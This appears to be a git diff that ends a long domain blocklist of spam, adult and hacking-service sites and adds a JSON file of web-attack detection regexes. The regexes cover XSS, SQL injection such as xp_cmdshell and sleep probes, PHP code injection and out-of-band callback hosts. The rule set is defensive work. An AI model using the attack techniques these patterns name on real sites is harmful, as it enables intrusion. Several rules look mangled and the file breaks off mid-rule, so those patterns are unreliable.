+vilingstore.net +villacoloniale.com +villakohlanta.nu +vinsit.ru +vintontech.info +vinylvault.co.uk +vip-dom.in +vip-file.com +vip-parfumeria.ru +vip.51.la +vip2ch.com +vipcallsgirls.com +vipms.ru +vipps.com.my +vipromoffers.com +vipsexfinders.com +vipsiterip.org +virtuagirl.com +virtualbb.com +virus-respirators.com +virus-schutzmasken.de +visa-china.ru +visa-pasport.ru +visionwell.com.cn +visitcambridge.org +vita.com.hr +vitalads.net +vitanail.ru +viteonlusarezzo.it +vitoriacabos.com +viven.host.sk +viveresaniesnelli.it +vizag.kharkov.ua +vizitki.net +vk-mus.ru +vkak.ru +vkgaleria.com +vkmusics.ru +vkonche.com +vkontaktemusic.ru +vkontarkte.com +vksaver-all.ru +vksex.ru +vladhistory.com +vladimir.xrus.org +vladimir.zrus.org +vltai.com +vmnmvzsmn.over-blog.com +vod.com.ua +vodaodessa.com +voditeltrezviy.ru +vodkoved.ru +volgograd.xrus.org +voloo.ru +voloomoney.com +voloslove.ru +voltrknc1.com +volume-pills.biz +voluumtracker1.com +voluumtrk.com +vonradio.com +voprosotvet24.ru +voronezh.xrus.org +vostoktrade.info +vote-up.ru +vozbujdenie.com +vpnhowto.info +vpnmouse.com +vremya.eu +vriel.batcave.net +vrnelectro.ru +vrotike.ru +vroze.com +vsdshnik.com +vse-pesni.com +vseigru.one +vseigry.fun +vsesubwaysurfers.com +vseuznaem.com +vsexkontakte.net +vtc.pw +vtcdns.com +vuclip.com +vucms.com +vut.com.ru +vvon.co.uk +vvpg.ru +vykup-avto-krasnodar.ru +vykupavto-krasnodar.ru +vysigy.su +vzglyadriv.kg +vzlom-na-zakaz.com +vzlomfb.com +vzlomsn.org +vzlomtw.com +vzubah.com +vzube.com +w-journal.ru +w3data.co +w3javascript.com +w7s.ru +wahicbefa31.soup.io +wait3sec.org +walkme.com +wallpaperaccess.com +wallpapers-best.com +wallpapersdesk.info +wallpapersist.com +wallpaperstock.net +walpaperlist.com +wanker.us +wapsite.me +wardreapptokone.tk +wareseeker.com +warezaccess.com +warezkeeper.com +warning.or.kr +warningwar.ru +warningzscaler.heraeus.com +watch-movies.ru +watchdogs-2.ru +watchinf.com +watchmyfb.pl +watchmygf.net +waterefficiency.co +waterpurifier.club +watracker.net +watsonrealtycorp.com +waycash.net +waysbetter.cn +wcb.su +wdfdocando.com +wdrake.com +we-are-gamers.com +web-analytics.date +web-betting.ru +web.cvut.cz +webads.co.nz +webadvance.club +webalan.ru +webcamdevochka.com +webcamtalk.net +webenlace.com.ar +webextract.profound.net +webinstantservice.com +webix.biz +webix.me +webjam.com +webkeyit.com +weblibrary.win +weblo.com +webmasterhome.cn +webmasters.stackexchange.com +webmonetizer.net +webnode.me +weboptimizes.com +webpromotion.ae +webradiology.ru +webs.com +webscouter.net +webshoppermac.com +website-analytics.online +website-analyzer.info +website-audit.com.ua +website-datenbank.de +website-speed-check.site +website-speed-checker.site +website-speed-up.site +website-speed-up.top +website-stealer.nufaq.com +websiteaccountant.de +websiteexplorer.info +websites-reviews.com +websitevaluebot.com +webstatsdomain.org +webtherapy.ru +weburlopener.com +weburok.com +wechatdownload10.com +weclipart.com +wedding-salon.net +wedding0venues.tk +weddingdresses.xyz +weekes.biz.tc +weightatraining.com +wejdz-tu.pl +welck.octopis.com +welcomeauto.ru +wellcome2slovenia.ru +wemarketing.se +wemedinc.com +weprik.ru +wesharepics.com +wesharepics.info +wesharepics.site +westen-v.life +westen-z.life +westermarkanjou.se +westsextube.com +westum.se +westvilletowingservices.co.za +wetgames.ru +wfb.hatedriveapart.com +whatistizanidine2mg.blogspot.com +whatistizanidinehclusedfor.blogspot.com +whatsappbot.flyland.ru +whatsappdownload10.com +whatsupinfoley.com +whatzmyip.net +wheelchairliftsarea.com +whengirlsgowild.com +where-toget.com +whereiskentoday.com +whereverdesperate.gq +while.cheapwebsitehoster.com +whipme.yopoint.in +white-truck.life +whiteelephantwellington.com +whiteproduct.com +wholesalecheapjerseysfree.com +wholesalejerseychinaoutlet.com +wholesalejerseychinashop.com +wholesalejerseys-cheapest.com +wholesalejerseyscheapjerseys.us.com +wholesalejerseysgaa.com +wholesalenfljerseys.us.com +wholinkstome.com +whos.amung.us +whosonmyserver.com +wieseversa.no +wikes.20fr.com +wildcattube.com +wildnatureimages.com +wildworld.site +williamrobsonproperty.com +win-spy.com +windowssearch-exp.com +wineitudes.wordpress.com +wineration.com +wingsoffury2.com +wingsofrefuge.net +winner7777.net +winterclassichockeyjerseys.com +winwotgold.pl +winx-play.ru +wiosenny-bon-1500.pl +witclub.info +witherrom55.eklablog.fr +withstandingheartwarming.com +wjgony.com +wladimirpayen.com +wleuaprpxuvr.ga +wma-x.com +wnhjavlhezp.gq +wnoz.de +womama.ru +woman-h.ru +woman-orgasm.ru +woman-tampon.ru +womens-journal.net +womensplay.net +womensterritory.ru +wonderfulflowers.biz +woodyguthrie.se +word-vorlagen.net +word-vorlagen.xyz +wordkeyhelper.com +wordpress-crew.net +wordpresscore.com +workle.website +works.if.ua +world-mmo.com +worldhistory.biz +worldinternetauthority.com +worldis.me +worldlovers.ru +worldmusicfests.com +worldoffiles.ru +worldtraveler.world +wormix-cheats.ru +worst-sites.online +wosik-dach.service-for-web.de +wovis.site +wowas31.ucoz.ru +wowcasinoonline.ooo +woweb.com.ua +wpsecurity.website +wpthemedetector.co.uk +writersgroup580.web.fc2.com +writingservices17.blogspot.ru +wrona.it +wrz0iuebwhp5fg.freeddns.com +ws.ampower.me +wsgames.ru +wstroika.ru +wtsindia.in +wttavern.com +wufak.com +wurr.voila.net +ww1943.ru +ww2awards.info +www.888.com +www.arenda-yeisk.ru +www.bookmaker-bets.com +www.ehscloud.cn +www.event-tracking.com +www.get-free-traffic-now.com +www.jbetting.com +www.kabbalah-red-bracelets.com +www.labves.ru +www.pinnacle-bets.com +www.solartek.ru +www.souvenirua.com +www.timer4web.com +www.wohnkabinen-shop.de +wwwadultcheck.com +wygraj-skiny.win +wygraj-teraz.com +wyniki-lista.pl +wzgyyq.com +x-diesel.biz +x-diesel.com +x-diesel.info +x-diesel.org +x-lime.com +x-lime.net +x-mix.info +x-musics.com +x-porno.video +x-rates.ru +x-stars.ru +x-true.info +x5market.ru +x69ty.ru +xaijo.com +xaylapdiendanang.com +xbaboon.com +xblog.in +xblognetwork.com +xboxster.ru +xcc24.pl +xchangetrak.com +xchat26.myfreecams.com +xclicks.net +xcombear.ru +xdoza.com +xedserver.com +xep.info +xerox-douglas.cf +xev.ru +xfire.com +xfluro.com +xgames-04.com +xgftnlrt.bloger.index.hr +xingzi-vision.com +xitjw.info +xjlottery.com +xjrul.com +xkaz.org +xlolitka.com +xlovecam.com +xmladserver.com +xmlinde.com +xmnb.net +xmronta.com +xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai +xn-----6kcaabbafhu7cskl7akvongwpo7hvjj.xn--p1ai +xn-----6kcaacnblni5c5bicdpcmficy.xn--p1ai +xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai +xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai +xn-----7kceclhb4abre1b4a0ccl2fxch1a.xn--p1ai +xn-----8kcatubaocd1bneepefojs1h2e.xn--p1ai +xn----7sbaaabaei0cc8aj5bj0bncejx.xn--p1ai +xn----7sbahjd3btneuw1joc.xn--p1ai +xn----7sbaphztdjeboffeiof6c.xn--p1ai +xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai +xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai +xn----7sbho2agebbhlivy.xn--p1ai +xn----7sbifcamovvfggw9d.xn--p1ai +xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks +xn----8sbdbjgb1ap7a9c4czbh.xn--p1acf +xn----8sbhefaln6acifdaon5c6f4axh.xn--p1ai +xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai +xn----9sbebi2bvzr7h.xn--p1ai +xn----9sbubg3ambdfl1j.xn--p1ai +xn----btbdvdh4aafrfciljm6k.xn--p1ai +xn----ctbbcjd3dbsehgi.xn--p1ai +xn----ctbigni3aj4h.xn--p1ai +xn----dtbndd4ae7eub.top +xn----itbeirbjbi7bc6bh2d.xn--p1ai +xn----itbkqkfiq.xn--p1ai +xn--1-8sbcpb0bdm8k6a.xn--p1ai +xn--24-glceagatoq7c2a6ioc.xn--p1ai +xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai +xn--80aaagvmjabrs1aoc9luc.xn--p1ai +xn--80aaajbdbddwj2alwjieei2afr3v.xn--p1ai +xn--80aaaks3bbhabgbigamdr2h.xn--p1ai +xn--80aafb2a.xn--p1ai +xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai +xn--80aanaardaperhcem4a6i.com +xn--80ab4aa2g.xn--p1ai +xn--80abgj3a5acid6ghs.top +xn--80adaggc5bdhlfamsfdij4p7b.xn--p1ai +xn--80aeahghtf8ac5i.xn--p1ai +xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai +xn--80ahdheogk5l.xn--p1ai +xn--80ahvj9e.xn--p1ai +xn--80aikhbrhr.net +xn--80ajbshivpvn2i.xn--p1ai +xn--80ajjbdhgmudixfjc8c5a9df8b.xn--p1ai +xn--80ak6aa92e.com +xn--80aodinpgi.xn--p1ai +xn--80atua3d.xn--p1ai +xn--90acenikpebbdd4f6d.xn--p1ai +xn--b1adccaf1bzj.xn--p1ai +xn--b1addnj3cah.xn--p1ai +xn--b1ag5cfn.xn--p1ai +xn--b1agm2d.net +xn--c1acygb.xn--p1ai +xn--d1abj0abs9d.in.ua +xn--d1acah0c.xn--p1ai +xn--d1aifoe0a9a.top +xn--e1afanlbnfckd7c3d.xn--p1ai +xn--e1aggki3c.xn--80adxhks +xn--h1aakne2ba.xn--p1ai +xn--h1ahbi.com.ua +xn--hxazdsfy.blogspot.com +xn--l1aengat.xn--p1ai +xn--lifehacer-1rb.com +xn--oogle-wmc.com +xn--q1a.xn--b1aube0e.xn--c1acygb.xn--p1ai +xnxx-n.com +xnxx699.com +xnxxandxvideos.com +xolodremont.ru +xportvusbdriver8i.snack.ws +xpresscare.ru +xrus.org +xsfetish.org +xsion.net +xtraffic.plus +xtrafficplus.com +xtremeeagles.net +xtube.com +xtubeporno.net +xuki.us +xvideosbay.com +xvideosporn.biz +xvideospornoru.com +xwatt.ru +xxart.ru +xxlargepop.com +xxx-cam.webcam +xxx-treker.ru +xxxasianporn.net +xxxdatinglocal.us +xxxguitars.com +xxxhdvideo.site +xxxkaz.org +xxxmania.top +xxxnatelefon.ru +xxxrus.org +xxxsiterips.xyz +xxxtube69.com +xxxtubesafari.com +xz618.com +xzlive.com +y8games-free.com +yaaknaa.info +yachts-cruise.info +yaderenergy.ru +yadro.ru +yaminecraft.ru +yaoguangdj.com +yatrk.xyz +yeartwit.com +yebocasino.co.za +yebocasino.com +yellocloud.be +yellowads.men +yellowfootprints.com +yellowproxy.net +yellowstonesafaritours.com +yellowstonevisitortours.com +yes-com.com +yginekologa.com +yhit.press +ynymnwbm.bloger.index.hr +yogamatsexpert.com +yoluxuryevents.com +yoopsie.com +yopoint.in +yoshkarola.zrus.org +yottos.com +you-shall-not-pass.is74.ru +youandcredit.ru +youbloodyripper.com +youbrainboost.asia +youdao.com +youdesigner.kz +yougame.biz +yougetsignal.com +youghbould.wordpress.com +yougotanewdomain.com +youjizz.com +youjizz.vc +youporn-forum.ga +youporn-ru.com +your-bearings.com +youradexchange.com +yourads.website +youradulthosting.com +youraticles.pl +yourdesires.ru +youresponsive.com +yourmovies.pl +yourothersite.com +yourporn.com +yourporngay.com +yoursearch.me +yourserverisdown.com +yoursite.com +yourtemplatefinder.com +yousense.info +youthreaders.com +youtoner.it +youtube-downloader.savetubevideo.com +youtubedownload.org +youtubologia.it +youtuhe.com +ypmuseum.ru +ytmnd.com +yuarra.pluto.ro +yubikk.info +yugk.net +yugo-star.ru +yun56.co +yunque.pluto.ro +yur-p.ru +yurgorod.ru +yuweng.info +z-master.ru +za-fun-offer.com +za-music.mymobiplanet.com +zaapplesales.blogspot.com +zacreditom.ru +zagadki.in.ua +zahvat.ru +zaidia.xhost.ro +zaim-pod-zalog-krasnodar.ru +zaimhelp.ru +zaimite.ru +zajm-pod-zalog-nedvizhimosti.ru +zajm-zalog-krasnodar.ru +zakazfutbolki.com +zakazvzloma.com +zakon-ob-obrazovanii.ru +zakonobosago.ru +zaloadi.ru +zaloro.com +zambini.ru +zaobao.com.sg +zapatosenventa.info +zapiszto.pl +zarabiaj-dzis.pl +zarabotat-na-sajte.ru +zarabotok--doma.ru +zarajbuilders.com +zarenica.net +zarepta.com +zastenchivosti.net +zastroyka.org +zatjmuzu.info +zawyna.ua +zazagames.org +zdesformula.ru +zdesoboi.com +zebradudka.com +zebramart.ru +zed21.net +zeg-distribution.com +zeikopay.com +zeleznobeton.ru +zero1.it +zerocash.msk.ru +zeroredirect.com +zeroredirect1.com +zeroredirect10.com +zeroredirect11.com +zeroredirect12.com +zeroredirect2.com +zeroredirect5.com +zeroredirect6.com +zeroredirect7.com +zeroredirect8.com +zeroredirect9.com +zetgie.com.pl +zetmaster.ru +zhacker.net +zhongwenlink.com +zhorapankratov7.blogspot.com +zhuravlev.info +zigarettenonl.canalblog.com +zigarettenonlinekaufen.tumblr.com +zigarettenonlinekaufen1.bloog.pl +zigarettenonlinekaufen1.blox.pl +zigarettenonlinekaufen2.bloog.pl +zigarettenonlinekaufen2.drupalgardens.com +zigzog.ru +zionstar.net +zirondelli.it +zixizop.net.ru +zkjovpdgxivg.ga +zlatnajesen.com +zmoda.hostreo.com +znakom.sibtest.ru +znakomstva-moskva77.ru +znakomstva-piter78.ru +znakomstvaonlain.ru +znaniyapolza.ru +znaturaloriginal.com +zocaparj.kz +zog.link +zojirushi-products.ru +zolotoy-lis.ru +zona-aqua.ru +zone-kev717.info +zoodrawings.com +zoogdiesney.com +zoogdinsney.com +zoogdisany.com +zooggames.com +zoolubimets.ru +zoominfo.com +zoomovies.org +zoompegs.com +zoosexart.com +zootoplist.com +zootravel.com +zophim.me +zrelaya.pw +zreloeporno.tv +zrizvtrnpale.tk +zrus.org +zryydi.com +zs2vm.top +zscaler.net +zscalerone.net +zscalertwo.net +zskdla.site +zverokruh-shop.cz +zvetki.ru +zvezdagedon.ru +zvooq.eu +zvuker.net +zx6.ru +zygophyceous.womanstars.site +zynax.ua +zytpirwai.net +zzbroya.com.ua +zzlgxh.com \ No newline at end of file diff --git a/db/common-web-attacks.json b/db/common-web-attacks.json new file mode 100644 index 00000000..70cad69c --- /dev/null +++ b/db/common-web-attacks.json @@ -0,0 +1 @@ +{"filters":[{"id":1,"rule":"(?:\"[^\"]*[^-]?>)|(?:[^\\w\\s]\\s*\\/>)|(?:>\")","description":"finds html breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":2,"rule":"(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])","description":"finds attribute breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":3,"rule":"(?:^>[\\w\\s]*<\\/?\\w{2,}>)","description":"finds unquoted attribute breaking injections","tags":["xss","csrf"],"impact":2},{"id":4,"rule":"(?:[+\\/]\\s*name[\\W\\d]*[)+])|(?:;\\W*url\\s*=)|(?:[^\\w\\s\\/?:>]\\s*(?:location|referrer|name)\\s*[^\\/\\w\\s-])","description":"Detects url-, name-, JSON, and referrer-contained payload attacks","tags":["xss","csrf"],"impact":5},{"id":5,"rule":"(?:\\W\\s*hash\\s*[^\\w\\s-])|(?:\\w+=\\W*[^,]*,[^\\s(]\\s*\\()|(?:\\?\"[^\\s\"]\":)|(?:(?]*)t(?!rong))|(?:\\)|(?:[^*]\\/\\*|\\*\\/[^*])|(?:(?:[\\W\\d]#|--|{)$)|(?:\\/{3,}.*$)|(?:)","description":"Detects common comment types","tags":["xss","csrf","id"],"impact":3},{"id":37,"rule":"(?:\\~])","description":"Detects conditional SQL injection attempts","tags":["sqli","id","lfi"],"impact":6},{"id":42,"rule":"(?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:^.?\"$)|(?:(?:^[\"\\\\]*(?:[\\d\"]+|[^\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[^\\w\\s]\\w+\\s*[|-]\\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[^\\w\\s])|(?:[^\\w\\s:]\\s*\\d\\W+[^\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W)","description":"Detects classic SQL injection probings 1/2","tags":["sqli","id","lfi"],"impact":6},{"id":43,"rule":"(?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\^\")|(?:^[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[^\\w\\s]+\\W*\\d\\W*.*[\"\\d])|(?:\"\\s*[^\\w\\s?]+\\s*[^\\w\\s]+\\s*\")|(?:\"\\s*[^\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[^\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[^\\w\\s]+\"[^,])","description":"Detects classic SQL injection probings 2/2","tags":["sqli","id","lfi"],"impact":6},{"id":44,"rule":"(?:\\d\"\\s+\"\\s+\\d)|(?:^admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[^\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|][\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\")","description":"Detects basic SQL authentication bypass attempts 1/3","tags":["sqli","id","lfi"],"impact":7},{"id":45,"rule":"(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()","description":"Detects basic SQL authentication bypass attempts 2/3","tags":["sqli","id","lfi"],"impact":7},{"id":46,"rule":"(?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|sounds\\s+like\\s*\"|[=\\d]+x))|(\"\\s*\\d\\s*(?:--|#))|(?:\"[%&<>^=]+\\d\\s*(=|or))|(?:\"\\W+[\\w+-]+\\s*=\\s*\\d\\W+\")|(?:\"\\s*is\\s*\\d.+\"?\\w)|(?:\"\\|?[\\w-]{3,}[^\\w\\s.,]+\")|(?:\"\\s*is\\s*[\\d.]+\\s*\\W.*\")","description":"Detects basic SQL authentication bypass attempts 3/3","tags":["sqli","id","lfi"],"impact":7},{"id":47,"rule":"(?:[\\d\\W]\\s+as\\s*[\"\\w]+\\s*from)|(?:^[\\W\\d]+\\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s+(?:(?:group_)concat|char|load_file)\\s?\\(?)|(?:end\\s*\\);)|(\"\\s+regexp\\W)|(?:[\\s(]load_file\\s*\\()","description":"Detects concatenated basic SQL injection and SQLLFI attempts","tags":["sqli","id","lfi"],"impact":5},{"id":48,"rule":"(?:@.+=\\s*\\(\\s*select)|(?:\\d+\\s*or\\s*\\d+\\s*[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|or|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*(?:drop|alter))|(?:(?:;|#|--)\\s*(?:update|insert)\\s*\\w{2,})|(?:[^\\w]SET\\s*@\\w+)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*[!=+]+[\\s\\d]*[\"=()])","description":"Detects chained SQL injection attempts 1/2","tags":["sqli","id"],"impact":6},{"id":49,"rule":"(?:\"\\s+and\\s*=\\W)|(?:\\(\\s*select\\s*\\w+\\s*\\()|(?:\\*\\/from)|(?:\\+\\s*\\d+\\s*\\+\\s*@)|(?:\\w\"\\s*(?:[-+=|@]+\\s*)+[\\d(])|(?:coalesce\\s*\\(|@@\\w+\\s*[^\\w\\s])|(?:\\W!+\"\\w)|(?:\";\\s*(?:if|while|begin))|(?:\"[\\s\\d]+=\\s*\\d)|(?:order\\s+by\\s+if\\w*\\s*\\()|(?:[\\s(]+case\\d*\\W.+[tw]hen[\\s(])","description":"Detects chained SQL injection attempts 2/2","tags":["sqli","id"],"impact":6},{"id":50,"rule":"(?:(select|;)\\s+(?:benchmark|if|sleep)\\s*?\\(\\s*\\(?\\s*\\w+)","description":"Detects SQL benchmark and sleep injection attempts including conditional queries","tags":["sqli","id"],"impact":4},{"id":51,"rule":"(?:create\\s+function\\s+\\w+\\s+returns)|(?:;\\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*[\\[(]?\\w{2,})","description":"Detects MySQL UDF injection and other data/structure manipulation attempts","tags":["sqli","id"],"impact":6},{"id":52,"rule":"(?:alter\\s*\\w+.*character\\s+set\\s+\\w+)|(\";\\s*waitfor\\s+time\\s+\")|(?:\";.*:\\s*goto)","description":"Detects MySQL charset switch and MSSQL DoS attempts","tags":["sqli","id"],"impact":6},{"id":53,"rule":"(?:procedure\\s+analyse\\s*\\()|(?:;\\s*(declare|open)\\s+[\\w-]+)|(?:create\\s+(procedure|function)\\s*\\w+\\s*\\(\\s*\\)\\s*-)|(?:declare[^\\w]+[@#]\\s*\\w+)|(exec\\s*\\(\\s*@)","description":"Detects MySQL and PostgreSQL stored procedure/function injections","tags":["sqli","id"],"impact":7},{"id":54,"rule":"(?:select\\s*pg_sleep)|(?:waitfor\\s*delay\\s?\"+\\s?\\d)|(?:;\\s*shutdown\\s*(?:;|--|#|\\/\\*|{))","description":"Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts","tags":["sqli","id"],"impact":5},{"id":55,"rule":"(?:\\sexec\\s+xp_cmdshell)|(?:\"\\s*!\\s*[\"\\w])|(?:from\\W+information_schema\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\s*\\([^\\)]*)|(?:\";?\\s*(?:select|union|having)\\s*[^\\s])|(?:\\wiif\\s*\\()|(?:exec\\s+master\\.)|(?:union\\sselect\\s@)|(?:union[\\w(\\s]*select)|(?:select.*\\w?user\\()|(?:into[\\s+]+(?:dump|out)file\\s*\")","description":"Detects MSSQL code execution and information gathering attempts","tags":["sqli","id"],"impact":5},{"id":56,"rule":"(?:merge.*using\\s*\\()|(execute\\s*immediate\\s*\")|(?:\\W+\\d*\\s*having\\s*[^\\s\\-])|(?:match\\s*[\\w(),+-]+\\s*against\\s*\\()","description":"Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections","tags":["sqli","id"],"impact":5},{"id":57,"rule":"(?:,.*[)\\da-f\"]\"(?:\".*\"|\\Z|[^\"]+))|(?:\\Wselect.+\\W*from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*\\(\\s*space\\s*\\()","description":"Detects MySQL comment-/space-obfuscated injections and backtick termination","tags":["sqli","id"],"impact":5},{"id":58,"rule":"(?:@[\\w-]+\\s*\\()|(?:]\\s*\\(\\s*[\"!]\\s*\\w)|(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;[\\s\\w|]*\\$\\w+\\s*=)|(?:\\$\\w+\\s*=(?:(?:\\s*\\$?\\w+\\s*[(;])|\\s*\".*\"))|(?:;\\s*\\{\\W*\\w+\\s*\\()","description":"Detects code injection attempts 1/3","tags":["id","rfe","lfi"],"impact":7},{"id":59,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\\w+|execute)\\s*[\"(@])","description":"Detects code injection attempts 2/3","tags":["id","rfe","lfi"],"impact":7},{"id":60,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*[^\\w](?:echo|print|print_r|var_dump|[fp]open))|(?:;\\s*rm\\s+-\\w+\\s+)|(?:;.*{.*\\$\\w+\\s*=)|(?:\\$\\w+\\s*\\[\\]\\s*=\\s*)","description":"Detects code injection attempts 3/3","tags":["id","rfe","lfi"],"impact":7},{"id":62,"rule":"(?:function[^(]*\\([^)]*\\))|(?:(?:delete|void|throw|instanceof|new|typeof)[^\\w.]+\\w+\\s*[([])|([)\\]]\\s*\\.\\s*\\w+\\s*=)|(?:\\(\\s*new\\s+\\w+\\s*\\)\\.)","description":"Detects common function declarations and special JS operators","tags":["id","rfe","lfi"],"impact":5},{"id":63,"rule":"(?:[\\w.-]+@[\\w.-]+%(?:[01][\\db-ce-f])+\\w+:)","description":"Detects common mail header injections","tags":["id","spam"],"impact":5},{"id":64,"rule":"(?:\\.pl\\?\\w+=\\w?\\|\\w+;)|(?:\\|\\(\\w+=\\*)|(?:\\*\\s*\\)+\\s*;)","description":"Detects perl echo shellcode injection and LDAP vectors","tags":["lfi","rfe"],"impact":5},{"id":65,"rule":"(?:(^|\\W)const\\s+[\\w\\-]+\\s*=)|(?:(?:do|for|while)\\s*\\([^;]+;+\\))|(?:(?:^|\\W)on\\w+\\s*=[\\w\\W]*(?:on\\w+|alert|eval|print|confirm|prompt))|(?:groups=\\d+\\(\\w+\\))|(?:(.)\\1{128,})","description":"Detects basic XSS DoS attempts","tags":["rfe","dos"],"impact":5},{"id":67,"rule":"(?:\\({2,}\\+{2,}:{2,})|(?:\\({2,}\\+{2,}:+)|(?:\\({3,}\\++:{2,})|(?:\\$\\[!!!\\])","description":"Detects unknown attack vectors based on PHPIDS Centrifuge detection","tags":["xss","csrf","id","rfe","lfi"],"impact":7},{"id":68,"rule":"(?:[\\s\\/\"]+[-\\w\\/\\\\\\*]+\\s*=.+(?:\\/\\s*>))","description":"Finds attribute breaking injections including obfuscated attributes","tags":["xss","csrf"],"impact":4},{"id":69,"rule":"(?:(?:msgbox|eval)\\s*\\+|(?:language\\s*=\\*vbscript))","description":"Finds basic VBScript injection attempts","tags":["xss","csrf"],"impact":4},{"id":70,"rule":"(?:\\[\\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|or)\\])","description":"Finds basic MongoDB SQL injection attempts","tags":["sqli"],"impact":4},{"id":71,"rule":"(?:[\\s\\d\\/\"]+(?:on\\w+|style|poster|background)=[$\"\\w])|(?:-type\\s*:\\s*multipart)","description":"finds malicious attribute injection attempts and MHTML attacks","tags":["xss","csrf"],"impact":6},{"id":72,"rule":"(?:(sleep\\((\\s*)(\\d*)(\\s*)\\)|benchmark\\((.*)\\,(.*)\\)))","description":"Detects blind sqli tests using sleep() or benchmark().","tags":["sqli","id"],"impact":4},{"id":73,"rule":"(?:(\\%SYSTEMROOT\\%))","description":"An attacker is trying to locate a file to read or write.","tags":["files","id"],"impact":4},{"id":75,"rule":"(?:(((.*)\\%[c|d|i|e|f|g|o|s|u|x|p|n]){8}))","description":"Looking for a format string attack","tags":["format string"],"impact":4},{"id":76,"rule":"(?:(union(.*)select(.*)from))","description":"Looking for basic sql injection. Common attack string for mysql, oracle and others.","tags":["sqli","id"],"impact":3},{"id":77,"rule":"(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|1e309)$)","description":"Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash","tags":["sqli","id"],"impact":3},{"id":78,"rule":"(?:%23.*?%0A)","description":"Detects SQL comment filter evasion","tags":["format string"],"impact":10},{"id":79,"rule":"((burpcollaborator|pipedream)\\.net|(canarytokens|requestrepo)\\.com|oast\\.(online|(liv|sit|m)e|fun|pro)|\\.ngrok(\\-free\\.(app|dev)|\\.((app|io)|dev)))","description":"Detects out-of-band (OOB) interaction or Server-Side Request Forgery (SSRF) attack 